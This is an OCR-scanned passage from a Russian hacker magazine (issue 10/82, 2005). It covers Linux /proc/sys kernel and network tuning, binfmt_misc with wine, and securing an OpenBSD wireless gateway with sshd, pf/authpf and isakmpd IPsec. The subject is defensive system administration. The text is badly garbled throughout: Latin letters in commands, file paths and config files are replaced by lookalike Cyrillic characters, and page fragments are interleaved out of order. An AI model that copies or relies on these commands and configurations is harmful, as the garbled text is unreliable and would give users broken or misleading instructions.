количеством файлов (база данных, веб-сервер и т.п.), то будет полез- 
ным увеличить число одновременно открытых файлов, записав в 
/ргос/зуз/кегпеІ/рісІ_тах необходимое значение. 

Теперь перейдем к более системным вещам. Наверняка ты сталкивался 
с такой проблемой, как «паника ядра». Это происходит, когда ядро по 
каким-либо причинам не может выполнять дальнейшую работу (самая 
частая причина — отсутствие поддержки корневой файловой системы). 
По умолчанию машина просто останавливается, но неплохо было бы ус- 
тановить небольшой таймаут, по истечению которого выполнялась бы 
перезагрузка. Это легко сделать, прописав в файл /ргос/зуз/кегпеі/рапіс 
число, отражающее интервал в секундах. Менее плачевная ситуация — 
это оорз, когда ядро еще в состоянии продолжать работу, что и делает 
по дефолту. Но прописав в /ргос/зуз/кегпеІ/рапіс_оп_оорз единицу, ты 
заставишь ядро паниковать и в этом случае. 

При формировании соге-файла его имя принимает вид имени обрушив- 
шейся программы плюс расширение, которое извлекается из /ргос/зуз/кег- 
пеі/соге _раПегп. Соответственно, если тебе чем-то не приглянулось расши- 
рение .соге, ты можешь его легко изменить. В дополнение к этой возмож- 
ности можно записать в файл /ргос/зуз/кегпеІ/соге_изез _рісІ единицу, и к 
расширению соге будет прибавляться еще и РЮ процесса. Удобно, если 
требуется отлаживать несколько экземпляров процесса раздельно. 

В ядре Ыпих присутствует такое понятие, как «испорченность». Оно вы- 
ражается в числе, которое находится в фаілпе/ргос/зуз/кегпеі/іаіпіесі. Ес- 
ли был загружен модуль с лицензией не совместимой с СРІ_, то число 
примет вид единицы. Двойка означает, что какой-то модуль загрузили 
принудительно (іпзтосі -I). И четыре, если в многопроцессорной систе- 
ме используются процессоры, не предназначенные для этого. 

[закидываем сети] Сетевых опций в І_іпих не просто много, а очень 
много (сказывается серверная история ОС). Поэтому я не буду рассматри- 
вать все настройки, а остановлюсь только на самых важных и полезных. 
Основные каталоги, на которые следует обратить внимание: 
/ргос/зуз/пеі/соге — настройки сетевого стека, /ргос/зуз/пеі/ірѵ4 — настройки 
протокола ТСР/ІР, /ргос/зуз/пе!/ірѵ4/сопІ — настройки сетевых интерфейсов. 
Файлы каталога /ргос/зуз/пеі/соге лучше вообще не трогать, чтобы ниче- 
го не испортить. Но если в твоем распоряжении находится нагруженный 
сервер, то рекомендуется увеличить размер входных и выходных буфе- 
ров до 1 Мб путем записи числа 1048576 в файлы гтет_сІеІаиІІ, 
гтет_тах, ѵѵтет_сІеІаиІІ и ѵѵтет_тах. 

Грамотный тюнинг стека ТСР/ІР может поднять производительность и за- 
щитить от некоторых видов сетевых атак. Для начала укажем ядру не от- 
вечать на широковещательные ріпд'и, чтобы наш хост не могли использо- 
вать для 0003-атак. Для этого запишем в файл істр_есИо_ідпоге_ЬгоасІ- 
сазіз единицу. Теперь защитимся от зуп-ІІоосІ атак путем включения оп- 
ции (единица) Іср_зупсоокіез. Если твоя машина не используется как 
маршрутизатор, то можешь отключить также и опцию ір_ІогѵѵагсІ. 
Попытаемся обмануть программы такие, как птар, которые умеют опре- 
делять ОС по свойствам сетевого стека. Для этого изменим дефолтное 
(64) значение ТТІ_ и запишем в файл Ір_с1е1аи11_иі число 128. Теперь 
немного оптимизаций. Уменьшим число попыток поддержать соедине- 
ние и запишем в Іср_кеераІіѵе_ргоЬез цифру два. Уменьшим частоту по- 
сылки пакетов о поддержании соединения до 30 минут (по умолчанию 2 
часа), запишем 1800 в 1ср_кеера1іѵе_1іте. Отключим так называемый 
ѵѵіпсіоѵѵ зсаііпд через файл Іср_ѵѵіпсІоѵѵ_5саІіпд. Уменьшим время ожида- 
ния РІЫ пакета до полного закрытия соединения (Іср_Ііп_ІітеоиІ=30). 
Также можно отключить опции 1ср_заск, 1ср_1ітез1атрз и для нагружен- 
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ным форматам исполняемых файлов. На уровне теории технология очень 
проста. Мы просто указываем ядру, что, например, файлы с расширением 
.ехе следует запускать при помощи ѵѵіпе. Теперь, если ты напишешь: 

$ ./ТМе.ехе 

То ядро выполнит команду ѵѵіпе ТМе.ехе, и бинарник успешно запустится. 
Неправда ли, удобно? Рассмотрим, как это выглядит на практике. Сна- 
чала примонтируем виртуальную ФС ЬіпІтІ_тізс: 

# тоипі ЬігФпЦпізс -I ЬіпІтЦпізс /р го с/зу з/Тз/Ь і пІт1:_т і зс 

Теперь запишем в файл /ргос/зузЛз/ЬіпІті_тізс/гедізІег информацию о 
файле и интерпретаторе в таком формате: «':имя:тип:смещение:маги- 
ческое_число:маска:путь_до_интерпретатора:». Если поле «тип» равно 
М, то тип файла вычисляется по магическому числу, лежащему по задан- 
ному смещению внутри бинарника. Напротив, если «тип» равен Е, то тип 
файла вычисляется по расширению, записанному в поле «магичес- 
кое_число». Поле «имя» — это всего лишь идентификатор, а поле «мас- 
ка» обычно пропускается. Зная все вышеперечисленное, выполняем ко- 
манду: 

# есНо ':ЕХЕ:Е::ехе::/изг/Ьіп/ѵѵіпе:' > /ргос/зузЛз/ЬіпІтІ_тізс/гедізІег 




пример работы системы ЬіпІтМтіізс 



ного сервера изменить диапазон доступных локальных портов, записав 
в файл ір_ІосаІ_рог1_гапде последовательность 16384 61000. 

В /ргос/зуз/пеі/ірѵ4/сопі находится несколько каталогов, обладающих 
именами сетевых интерфейсов. Наполнение их абсолютно идентично. 
Среди каталогов можно найти специальный каталог аІІ, изменения в ко- 
тором отразятся на всех интерфейсах. Но изменять тут, собственно, не- 
чего. Просто отключим форвардинг пакетов (если только твой ПК не 
маршрутизатор). Для этого запишем в файл Іогѵѵагсііпд ноль. А также 
включим журналирование всех пакетов с неизвестным обратным адре- 
сом (Іод_таЛіапз=1). Как ты, наверное, уже догадался, если обратный 
адрес неизвестен, то это значит, что он подменен. 

[файлы руками не трогать] Настройки файловых систем хранятся 
в каталоге /ргос/зузЛз. Необходимость в правке файлов этого каталога 
возникает очень редко, но для полноты картины мы все-таки рассмот- 
рим некоторые его элементы. 

Наверное, единственное, что тебе придется когда-либо изменять, — это 
максимальное количество одновременно открытых файлов. Делается 
это путем записи значения в файл Іііе-тах. Если у тебя нет нагруженно- 
го веб-сервера или базы данных, то изменять дефолтное значение не 
имеет никакого смысла. Количество открытых в текущий момент фай- 
лов можно узнать из файла Іііе-пг, он содержит три числа: число откры- 
тых файлов, ноль (всегда ноль в ядрах ветки 2.6) и значение из файла 
Іііе-тах. У меня, например, этот файл содержит 575 0 12408. 
Скомпилировав ядро с опцией ЕхесиІаЫе Іііе Іогтаіз КегпеІ зиррогі Іог 
МІЗС Ьіпагіез, ты получишь интересную возможность обучать ядро различ- 



Все, теперь можешь попробовать, твои экзешники будут запускаться. 

[развивай память] Изменяя файлы каталога /ргос/зуз/ѵт, можно 
влиять на работу подсистемы виртуальной памяти. В некоторых случаях 
это действие оказывается довольно полезным. Есть вероятность повы- 
сить отклик системы. 

В ядрах ветки 2.4 была предусмотрена возможность изменять множество 
различных параметров подсистемы виртуальной памяти. Ядра 2.6 стали 
более интеллектуальными, и теперь нет необходимости в ручном тюнин- 
ге большинства параметров. Зато был оставлен интерфейс управления 
демоном ЬсІТІизИ, который контролирует процесс записи «грязных» буфе- 
ров на диск. Все его конфиги располагаются в нескольких файлах с пре- 
фиксом сМу. Файл сІИу_ЬаскдгоипсІ_гаІіо отражает количество «грязных» 
страниц памяти (в процентах от общего количества памяти), при накопле- 
нии которых ЬсШизИ должен начать запись на диск. Каждый процесс мо- 
жет сам, без участия ЬсИІизІі, записывать данные обратно на диск. Файл 
с1Иу_гайо отражает количество страниц, при накоплении которых процесс 
сам должен начать запись на диск. Интервал между просыпаниями демо- 
на ЬсІІІизИ можно изменить через файл сІіг1у_ѵѵгіІеЬаск_сепІІ5есз (значение 
в сотых долях секунды). Время «старения» самих буферов контролирует- 
ся через файл сНгІу_ехріге_сепІізесз (опять же в сотых долях секунды). 
Увеличив значения в файлах сМу_ЬаскдгоипсІ_гайо и сІіг1у_ехріге_сеп- 
йзесз, мы можем добиться того, что запись «грязных» буферов на диск 
будет происходить реже, что повысит скорость реакции системы, но сама 
запись будет происходить дольше. И наоборот, более низкие значения в 
сМу_ЬаскдгоипсІ_гаІіо, бігіу_ѵѵгіІеЬаск_сепІізесз, сІіг1у_ехріге_сепІі5ес5 поз- 
волят ОС более равномерно распределять операции записи на диск. 



[нищета /ргос/$у$/сІеѵ] На данный момент единственным устройством, 
которым можно управлять через /ргос/зуз/сіеѵ, является СО-ВОМ. Все наст- 
ройки хранятся, соответственно, в каталоге сбгот. Причем файл іпіо не дос- 
тупен для записи и предназначен для получения параметров привода. Ос- 
тальные файлы позволяют контролировать поведение системы по отноше- 
нию к СО-ВОМ. Например, записав в файл Іоск ноль, ты получишь возмож- 
ность открывать лоток в то 
время, когда файловая сис- 
тема диска смонтирована. 
Как сам понимаешь, поведе- 
ние системы в этом случае 
непредсказуемо, и я не реко- 
мендую этого делать. Зато 
изменение файлов аійосіозе 
и аійофсі может оказаться 
довольно полезным. Если ты 
запишешь единицу в первый, 
то ОС будет сама закрывать 
лоток при монтировании дис- 
ка, единица для второго оз- 
начает автоматическое отк- 
рытие лотка при размонтиро- 
вании. На мой взгляд, вклю- 
чение обеих опций будет 
хорошей идеей © 
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НЕ ТРУДНО ПРЕДСТАВИТЬ, КАКОЙ УРОН МО- 
ЖЕТ НАНЕСТИ ПРОНИКНОВЕНИЕ ЗЛОУМЫШ- 
ЛЕННИКА В НЕЗАЩИЩЕННУЮ БЕСПРОВОДНУЮ 
СЕТЬ. И СОВСЕМ НЕ ВАЖНО, ПРИНАДЛЕЖИТ 
ЭТОТ СЕГМЕНТ КРУПНОЙ КОМПАНИИ, УНИВЕР- 
СИТЕТСКОМУ КАМПУСУ ИЛИ РЯДОВОМУ ПОЛЬ- 
ЗОВАТЕЛЮ — ПОСЛЕДСТВИЯ МОГУТ БЫТЬ 
КАТАСТРОФИЧЕСКИМИ. ВЫХОД ОДИН: ИСКЛЮ- 
ЧИТЬ ВЕРОЯТНОСТЬ НЕСАНКЦИОНИРОВАННО- 
ГО ДОСТУПА И УТЕЧКИ КОНФИДЕНЦИАЛЬНОЙ 
ИНФОРМАЦИИ, ОБЕСПЕЧИВ НАДЕЖНУЮ И ОД- 
НОВРЕМЕННО ГИБКУЮ ЗАЩИТУ. НО КАК ЭТО 
СДЕЛАТЬ, КОГДА КРИПТОГРАФИЧЕСКОЙ СЛА- 
БОСТЬЮ ѴѴЕР МОЖЕТ ВОСПОЛЬЗОВАТЬСЯ ЛЮ- 
БОЙ ЖЕЛАЮЩИЙ, НОВЫЕ МЕХАНИЗМЫ БЕЗО- 
ПАСНОСТИ ѴѴРА/ѴѴРА2 ПОКА НЕ ПОЛУЧИЛИ 
ШИРОКОГО РАСПРОСТРАНЕНИЯ, А СТОИ- 
МОСТЬ АППАРАТНЫХ ѴРІ\І-РЕШЕНИЙ СТРЕМИТСЯ 

К БЕСКОНЕЧНОСТИ I Апсігеу Маіѵееѵ (апсІги5Ііоск@геаІ.хакер.ги) 



Совершенная защита 
беспроводной сети 

[роль шипастой рыбки в спасении утопающих] В настоящее 
время все больше и больше моделей ноутбуков и КПК оснащаются бесп- 
роводными сетевыми адаптерами стандарта ІЕЕЕ 802.11. Казалось бы, 
о таком развитии событий можно только мечтать. Однако у этой тенден- 
ции есть и оборотная сторона — удобство и мобильность планомерно 
отодвигают вопросы безопасности на второй план. Существующая проб- 
лема стоит настолько остро, что может серьезно затормозить триумфаль- 
ное шествие цифровых технологий в целом. Это прекрасно понимали раз- 
работчики ОрепВЗЭ, создавая инструментальную связку аиІЬрІ, ізактрсі, 
орепззЬ и рі, которая позволяет не только выполнять криптостойкое шиф- 
рование передаваемых данных, но и проводить аутентификацию клиента 
с помощью пароля, либо на базе публичного ключа. 

[Ьгаіпзіогт: особенности фортификации] Рассмотрим вариант, 
когда функции шлюза, объединяющего проводной и беспроводной 
участки сети, выполняет компьютер под управлением ОрепВЗО 3.8. По- 
мимо нэйтивной поддержки вышеперечисленных программных средств, 
в пользу сделанного выбора говорит и тот факт, что реализация ІРЗес 
как в ядре операционной системы, так и в пространстве пользователя 
выполнена (без преувеличения) на высочайшем уровне. Спешу успоко- 
ить противников опенка — настройка РгееВЗО, ІМеІВЗО и ОгадопІІуВЗО 
будет отличаться минимально. 

[ ЬАЫ ] (ІхрО) 

\ 

[ 6АТЕѴѴАѴ ]-(Тхр1 ) [ І5Р ]— 

/ 

[ І_АРТОР ] (гаІО) 

В приведенном сценарии гаІО — это сетевой интерфейс, закрепленный 
за РСГной карточкой (ЗідаЬуІе ОЫ-ѴѴРКО 802.11 Ь/д (-25$) и осуществля- 
ющий работу по спецификации 802. 1 1 д (тобе 1 1 д) на 11 -ом частотном 
канале (сЬап 11) в режиме точки доступа (тесііаор* Ьозіар) с уникаль- 
ным идентификатором сети (пѵѵіб ѵѵіап): 

#ѵі /еІсЛіозІпате.гаІО 

іпеі 192.168.2.1 255.255.255.0 ІМОІМЕ тесііа аиіозеіесі: тосіе 1 1 д \ 
тесііаорі Ііозіар пѵѵШ ѵѵіап сііап 11 

Предлагаю действовать следующим образом: если у беспроводного 
клиента (тестирование проводилось на ноуте с ѴѴіпХР ЗР2) соответству- 
ющим образом настроена политика ІРЗес, весь внутренний трафик бу- 
дет шифроваться засчет организации ІРЗес-туннеля с аутентификацией 
на основе парольной фразы («ргезЬагесІ кеу» станем называть именно 
так, чтобы избежать путаницы с другими ключами); как только со сторо- 
ны пользователя будет проведена аутентификация с помощью ззЬ-кли- 
ента, на шлюзе автоматически вступят в силу персональные правила 
файрвола, и юзер, в зависимости от привилегий, получит полный или 
ограниченный доступ в Сеть. 

[орепззН: первый блокпост] Несмотря на то, что бесплатно расп- 
ространяемый пакет ОрепЗЗН на протяжении последних лет успешно 
справляется с задачей предоставления защищенного доступа к удален- 
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список доступных сетевых интерфейсов 






#ѵі /еіс/Іодіп.сопі 



ным компьютерам, в настройках по умолчанию 
он не способен обеспечить необходимый уро- 
вень безопасности. Чтобы усложнить хайдже- 
керу проведение сетевой атаки с целью перех- 
вата и подмены ззГі-сессии, требуется переоп- 
ределить некоторые дефолтные значения пе- 
ременных ззИб(8). Засчет использования этих 
настроек мы будем уверены, что как только 
оболочка получит соответствующий сигнал, 
ззГі-сессия аутентифицированного пользовате- 
ля завершится должным образом, и не прои- 
зойдет сохранение состояния соединений в 
таблице записей файрвола. 

# ѵі /еіс/ззіі/ззіісі.сопіід 

Г Работа по протоколу ЗЗН2 обязательна 7 
РгоіосоІ 2 

Г Мы не будем использовать ІРѵб 7 
АбсІгеззРатіІу іпеі 

Г Ожидаем подключения по беспроводному 
сетевому интерфейсу 7 
ЫзіепАсІсігезз 192.168.2.1 
Г Запрещаем регистрацию суперпользовате- 
ля 7 

РегтііВооіІ_одіп по 

Г За счет использования ЗЗН2 и этих двух 
опций усложняем проведение атак типа АВР- 
и ІР-зрооТіпд 7 
СІіепіАІіѵеІпіегѵаІ 15 
СІіепіАІіѵеСоипіМах 3 

Г Включение ІІзеОЫЗ создает больше проб- 
лем, чем решает 7 
ІІзеОЫЗ по 

Г Определяем списки контроля доступом 7 
АІІоѵѵбгоирз ѵѵбееі ѵѵзгс изегз аиібрі 

После внесения изменений даем указание де- 
мону перечитать конфиг: 

# кіІІ -НІІР зесі ц /ѵаг/гип/ззМ.рісГ 

[рі: швартовка в океане сыщиков 
хотспотов] Мы давно уже привыкли к тому, 
что файрвол работает со статическим набором 
правил. И действительно, для большинства за- 
дач этого вполне достаточно. Но когда в сети 
появляются кочующие пользователи и/или 
беспроводные клиенты, такая схема работы ру- 
шится, как карточный домик. Одна из замеча- 
тельных возможностей рТ(4) заключается в том, 
что можно подключать рулесеты к основному 
конфигу рі.сопі(5) «на лету». Отвечают за эту 
фичу так называемые анчоры (якоря), работу 
которых проиллюстрируем в боевых условиях: 

# ѵі /еіс/рі.сопі 

Г Объявляем макросы 7 



епс_іТ = "епсО" 
іпі_іі = "гаЮ" 

Г Подключаем правила для трансляции сете- 
вых адресов 7 
паі-апсіж "аиібрі/*" 

Г Подключаем правила для корректной ра- 
боты Йр- и р2р-клиентов 7 
гбг-апсіж "аиібр \Г" 

Г Разрешаем и регистрируем доступ к ззЫ 
(22/іср), ізактрсі (500/исІр) 7 
раза іп Іод циіск оп $іпі_іі іпеі ргоіо іср ігот 
$іпі_іі:пеіѵѵогк\ 
іо $іпі_іі рогі 55І1 кеер зіаіе 
раза іп Іод циіск оп $іпі_іі іпеі ргоіо исір ігот 
$іпі_іі:пеі\л/огк\ 
іо $іпі_іі рогі ізактр кеер зіаіе 

Г Разрешаем прохождение зашифрованного 
трафика 7 

раза іп щек оп $іпі_іі іпеі ргоіо езр ігот 

$іпі_іі:пеіѵѵогк іо $іпі_іі 

раза іп щек оп $епс_іТ іпеі ргоіо ірепсар ігот 

$іпі_іі:пеі\А/огк іо $іпі_іі 

рааз іп щек оп $епс_іТ іпеі ігот $іпі_іі:пеі- 

ѵѵогк іо $іпі_іі кеер зіаіе 

/* Разрешаем прохождение исходящего тра- 
фика 7 

раза оиі щек оп $іпі_іі іпеі ігот апу іо 
$іпі_іі:пеі\А/огк кеер зіаіе 

/* Подключаем персональные правила поль- 
зователей 7 
апсііог "аиібрі/*" 

[аиіИрІ: исполнение желаний] Не секрет, 
что протокол шифрования ѴѴЕР выполнял аутен- 
тификацию устройства, а не пользователя. Этот 
недостаток был принят во внимание при разра- 
ботке аиІГірі(8) — особой псевдооболочки, кото- 
рая в динамическом режиме изменяет правила 
файрвола для аутентифицированного пользова- 
теля. Другими словами, после ввода пароля вхо- 
да в систему не происходит, вместо этого в силу 
вступают персональные рулесеты. Настройка 
аиШрі представляет собой нетривиальную зада- 
чу, поэтому остановлюсь на ней подробнее. 
Сначала расширяем список доступных команд- 
ных интерпретаторов: 

# есбо "/изг/зЬіп/аиіІірі" » /еіе/зііеііз 

В конец файла Іодіп.сопі(5) заносим сведения о 
новом классе ѵѵііі, пользователи которого в каче- 
стве стандартного шелла будут получать аиШрі. 



ѵѵііі:\ 

:5ИеМ=/изг/5Ьіп/аиіИрі:\ 

:іс=сіеіаиІі: 

Обновляем хэшированную базу данных 
/ еІс/Іодіп.сопІ.сІЬ : 

# сар_тксіЬ /еіс/Іодіп.сопі 

Нет необходимости изменять дефолтные зна- 
чения анчора (апсГюг="аи1Г|рГ) и таблицы ра- 
дикса ЦаЫе="аиІГірі_изегз"), поэтому /еІс/аиІГі- 
рі/аиІГірі.сопі оставляем пустым: 

# іоисб /еіс/аиібрі/аиібрі.сопі 

Подготавливаем приветственное сообщение, 
аналог /еІс/тоШ: 

# есбо "РІеазе ріау піее." > /еіе/аиібрі/аиіб- 
рі.теззаде 

Создаем файл с правилами файрвола, которые 
будут загружаться при успешной аутентификации 
беспроводного клиента и выгружаться при получе- 
нии сигнала ЗІОІЫТ (комбинация клавиш <СігІ-С>): 

# ѵі /еіс/аиіИ рі/аиіИ рі. ги Іез 

/* Используемые макросы 7 
ехі_іі = "іхрі" 
іпі_іі = "гаЮ" 

Г Выпускаем аутентифицированных пользова- 
телей в Сеть 7 

паі оп $ехі_іі іпеі ігот $изег_ір іо апу іад 
$изег_ір -> ($ехі_іі) 

Г Обеспечиваем корректную работу по про- 
токолу РТР 7 

гбг оп $іпі_іі іпеі ргоіо іер ігот $изег_ір іо апу 
рогі 21 \ 

->127.0.0.1 рогі 8021 

Г Логическое завершение первого правила 
— разрешаем прохождение пакетов 7 
разз іп щек оп $іпі_іі іпеі ігот $изег_ір іо апу 
раза оиі Іод щек оп $ехі_іі іпеі іаддеб 
$изег_ір кеер зіаіе 

Примечание: при использовании зарезервиро- 
ванных макросов $изег_ісІ и $изег_ір будет про- 
исходить автоматическая подстановка имени и 
ІР-адреса подключившегося пользователя. 

В каталоге /еіс/аиИір{/изегз/$ІІ8ЕН можно подго- 
товить особый набор персональных правил для 
(не)привилегированных пользователей. Это да- 
ет нам бескрайний простор для полета фанта- 
зии: организация ограниченного/полного досту- 
па в Интернет, демилитаризованную зону и/или 
закрытые сегменты сети, форвардинг входяще- 
го/исходящего ТСР/ІЮР трафика и т.д.). 
Например, в качестве бонуса предоставим поль- 
зователю зГюскег возможность получать НідН Ю 
на любом еЭ2к-сервере. Для этого необходимо 
сделать файл /еіс/аиіІірѴизегз/зІіоскег/аиІІірі.гиІез 
идентичным /еіе/аиііірі/аиііірі.гиіез, а затем доба- 
вить в него несколько магических правил пере- 
направления. 

# тксііг -р /еіс/аиііірі/изегз/зііоскег 

# ср /еіе/аиііірі/аиііірі.гиіез 
/еіс/аиііірі/изегз/зііоскег/аиііірі.гиіез 
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модифицируем правила файервола 



# ѵі /еіс/аиііірі/изегз/зііоскег/аиііірі.гиіез 



аюхіып 




[хакер 10 [82] 05 > ІІЫІХОЮ 108 ] 




[ЗПІр] 

гбг ра$$ оп $ехІ_і! іпеі ргоіо Іср Ігот апу Іо 

апу рог! 4661 -> $изег_ір 

гсіг разз оп $ехІ_і! іпеі ргоіо Іср Ігот апу Іо 

апу рогі 4662 -> $изег_ір 

гсіг разз оп $ехІ_іІ іпеі ргоіо исір Ігот апу Іо 

апу рогі 4665 -> $изег_ір 

гсіг разз оп $ех!_і! іпеі ргоіо исір Ігот апу Іо 

апу рогі 4672 -> $изег_ір 

[зпір] 



[Рііазе 2] 

Раззіѵе-соппесііопз = аиІИеп- 
Іісаіесі-реегз 



Г Подтверждаем отсутствие 
псевдонимов и задаем па- 
рольную фразу 7 
[ІосаІ-реегз] 

Рбазе = 1 

І_осаІ-аббгезз = 192.168.2.1 
АиІИепІісаІіоп = тураззѵѵогб 
СопТідигаІіоп = ізактр-таіп- 
тосіе 

Г Создаем список ІРЗес-сое- 
динений 7 
[аиііпепіісаіесі-реегз] 

Рбазе = 2 
ІЗАКМР-реег = ІосаІ-реегз 
І_осаІ-Ю = Іосаі-пеіѵѵогк 
Ветоіе-Ю = гетоіе-пеіѵѵогк 
СопТідигаІіоп = ізактр-диіск-тосіе 

Г Задаем маршруты для инкапсулированных 

соединений 7 

[ІосаІ-пеІѵѵогк] 

Ю-Іуре = ІРѴ4_А00Р_ЗиВЫЕТ 
Ыеіѵѵогк = 192.168.2.0 
ІМеІтазк = 255.255.255.0 



[ізактрсі: вернисаж ІР8ес-туннелей] 

Как мы помним, главные изъяны ѴѴЕР были об- 
наружены в процедурах аутентификации и 
шифрования. Кроме того, оказалось, что этот 
механизм достаточен только для малых сетей с 
умеренным трафиком. Следовательно, даже 
если бы он стал единственным стандартом де- 
факто, который предоставляет гарантии безо- 
пасности беспроводных сетей, его нельзя было 
бы применять для корпоративных решений. 
ІзактрсІ(8) обеспечивает работу по протоколу 
обмена секретными ключами (ІЗАКМР), справ- 
ляется с любыми нагрузками без снижения 
производительности, а также позволяет созда- 
вать невероятное количество ІРЗес-туннелей, 
используя при этом различные алгоритмы 
шифрования (например, Збез, ібеа, сазі, Ыоѵѵ- 
ІізГі, аез для атрибута езр_епс_аІд протокола 
ЕЗР) и методы аутентификации: на основе па- 
рольной фразы (мы будем рассматривать 
именно этот метод, в случае внушительного 
числа ѵѵіап-клиентов свой выбор лучше остано- 
вить на Х.509 аиІГі), серверных ключей, Кеупоіе 
и Х.509 сертификатов. Демон просто потрясает 
своими возможностями, так что будет не прос- 
то найти такую задачу построения ѴРІЧ, с кото- 
рой он не мог бы справиться. 

Для удобства главный конфигурационный 
файл сервера обмена ключей разбит на секции 
и содержит директивы с присвоенными значе- 
ниями. Далее прокомментирую ключевые мо- 
менты ізактрсІ.сопІ(5): 



[гетоіе-пеіѵѵогк] 

Ю-Іуре = ІРѴ4_А00В_ЗІІВІ\ІЕТ 
ІМѵѵогк = 192.168.2.0 
ІМеІтазк = 255.255.255.0 

Г В главном режиме указываем представле- 
ние потоков, специальный тип обмена паке- 
тами, и с помощью чего будем криптовать 
данные 7 
[ізактр-таіп-тосіе] 

001 = ІРЗЕС 

ЕХСНАІ\І6Е_ТѴРЕ = Ю_РР0Т 
Тгапзіогтз = ЗОЕЗ-ЗНА 

Г В быстром режиме указываем протокол, 
шифр и устойчивую к коллизиям хэш-функ- 
цию 7 

[ізактр-диіск-тосіе] 
йОІ = ІРЗЕС 

ЕХСНАІ\І6Е_ТѴРЕ = СШІСК.МСЮЕ 
Зиііез = ОМ-ЕЗР-ЗОЕЗ-ЗНА-РРЗ-ЗІЛТЕ 

Теперь необходимо создать ізактрсІ.роІісу(5), со- 
держащий политику для всех ІРЗес-соединений: 

# ѵі /еіс/ізактрб/ізактрб. роіісу 

КеуІМоІе-Ѵегзіоп: 2 
АиІІжігег: "Р0І_ІСѴ" 

Сопсііііопз: арр_ботаіп == "ІРзес роіісу" && 
езр_ргезепІ == "уез" && 
езр_епс_аІд == "Збез" -> "Ігие"; 



[ратные подвиги виндузятников] Клиен- 
тская настройка ІРЗес в ѴѴіпХР очень напоми- 
нает прохождение Зіегга'вского квеста: 

ЕЛ Зіагі -» Вип запускаем ттс 
Е Рііе АбсІ/Ветоѵе Зпар-іп -» ІР Зесигііу 
Роіісу Мападетепі -» І_осаІ Сотриіег -> РіпізГі 
СІозе 

Е Асііоп -> Сгеаіе ІР Зесигііу Роіісу ІЧехІ 
Ыехі -» снимаем галку с Асііѵаіе ІГіе беіаиіі 
гезропсе гиіе -> ЕсШ ргорегйез оставляем нетро- 
нутым Ыех! РіпізГі 
И ІЧеѵѵ ІР Зесигііу Роіісу -» Ргорегйез -» АбсІ 
ІЧехІ -> ТиппеІ Епфоіпі — ТГііз гиіе сіоез поі зрес- 
ііу а ІиппеІ -» Ыеіѵѵогк Туре — І_осаІ Агеа ІМеІѵѵогк 
(І_АГ\І) -> АиІГіепІісайоп МеІГюсІ — ІІзе ІГііз зігіпд Іо 
ргоіесі ІГіе кеу ехсГіапде (ргезГіагесІ кеу) — указы- 
ваем тураззѵѵогсі из/еіс/ізактрсі/ізактрсі.сопі 
ІР РіІІег І_ізІ -»АсІсІ АбсІ ІМехІ -» Зоигсе 
Асісігезз — Му ІР Асісігезз -> Оезйпайоп Асісігезз 
— А Зресіііс ІР Асісігезз — 192.168.2.1 -» Зеіесі а 
ргоіосоі Іуре — Апу, 0 -» устанавливаем галку 
ЕсІИ: ргорегйез -» РіпізГі -» проверяем введенные 
настройки ОК 

Е ІМеѵѵ ІР РіІІег І_ізІ Ыехі -» РіІІег Асііоп — 
Вециіге Зесигііу -» ЕсМ -» устанавливаем 
ЫедоЛагё зесигііу -» отмечаем Зеззіоп кеу рег- 
ІесС Іогѵѵагб зесгесу (РРЗ) -» ОК -» ІЧехІ -» РіпізГі 
-> Арріу -> ОК 
И Сопзоіеі -» Рііе -» Заѵе 
И Перезагружаемся, либо перезапускаем сер- 
вис ІРЗЕС Зегѵісез 

Е Зіагі Вип -> ттс -> Рііе -» Сопзоіеі Ыеѵѵ 
ІР Зесигііу Роіісу -» Аззідп 

В качестве альтернативы можно воспользовать- 
ся следующими программами: ірзесроі.ехе/ірзес- 
стб.ехе (из комплекта ѴѴіп2к/ѴѴіпХР Зиррогі 
Тооіз), ЗЗН ЗепііпеІ, ТГіеОгеепВоѵѵ ѴРЫ СІіепІ, ли- 
бо ЗаІеІЧеІ ЗоЛВетоІеІ_Т. 

[полигон для испытаний] Вся необходимая 
настройка выполнена, остается лишь прове- 
рить нашу конструкцию в действии. Добавляем 
в систему нового пользователя, который при- 
надлежит классу ѴѴі-Рі, входит в группу аиІГірІ 
и в качестве оболочки получает /изг/зЬіп/аиІГірІ: 

# изегабб -т -с ’ѵѵііі сііепі' -д аиібрі -І_ ѵѵіТі -з 
/изг/зЬіп/аиІІірІ зііоскег 

За него генерируем ВЗА-ключ длиной 2048 бит: 

# $ибо -и зііоскег ззб-кеудеп -I гза 

Разрешаем пользователю проводить аутенти- 
фикацию на основе публичного ключа: 

# ср /Ііоте/зІіоскег/.ззІі/іб.гза.риЬ 
/боте/збоскег/.ззіі/аиіііогііеб.кеуз 

# сбоѵѵп 5Ііоскег:аиІІірІ 
/боте/збоскег/.ззіі/аиіііогііеб.кеуз 



# ѵі /еіс/ізактрб/ізактрб.сопі 



Г Перечисляем фазы соединений 7 
[РІіазе 1] 

йеТаиІІ = ІосаІ-реегз 



Выставляем корректные права 
доступа для конфигов: 

# сііоѵѵп гооІ:ѵѵІіееІ 
/еіс/ізактрб/ізактрб.* 

# сбтоб 600 /еіс/ізактрб/ізактрб.* 

И запускаем демона на орбиту, 
предварительно отказавшись от 
использования протокола ІРѵб 
и реализации ЫАТ-ТгаѵегзаІ: 

# ізактрб -4Т 



/* Секция общего назначения: количество 
повторов, продолжительность таймаутов, ІР- 
адрес прослушиваемого интерфейса 7 
[бепегаі] 

Веігапзтііз = 5 
Ехсбапде-тах-бте = 120 
Ызіеп-оп = 192.168.2.1 



На стороне клиента открываем РиНу/ЗесигеСВТ, 
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получаем доступ в Сеть 
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статистика по рулесетам файрвола 



создаем новую сессию, указываем ІР-адрес шлю- 
за, имя пользователя и расположение публичного 
ключа. Если все корректно настроено, после ус- 
пешной авторизации правила файрвола на серве- 
ре изменятся, и юзер получит доступ в Интернет. 
Так как утилиты ѵѵ и ѵѵГю не предоставляют зна- 
чение РЮ, список подключенных в текущий мо- 
мент пользователей можно посмотреть с по- 
мощью рз, либо рТсІІ (здесь аиІГірІ — название 
анчора, зГюскег — имя пользователя, 3884 — 
уникальный идентификатор процесса): 

% рз ах I дгер аиібрі 

3884 рі Із+ 0:00.01 -аиібрі: зііоск- 

ег@1 92.1 68.2.2 (аиібрі) 

# рісіі -а аиібрі -зА 
аиІІірІ/5Ііоскег(3884) 

Посмотреть рулесеты для конкретного пользо- 
вателя можно так: 

# рісіі -а м аиІІірІ/5Ііоскег(3884)" -з гиіез 

разз іп циіск оп гаІО іпеі Ігот 1 92.1 68.2.2 Іо апу 
раза оиі Іод диіск оп Тхрі іпеі аІІ кеер зіаіе 
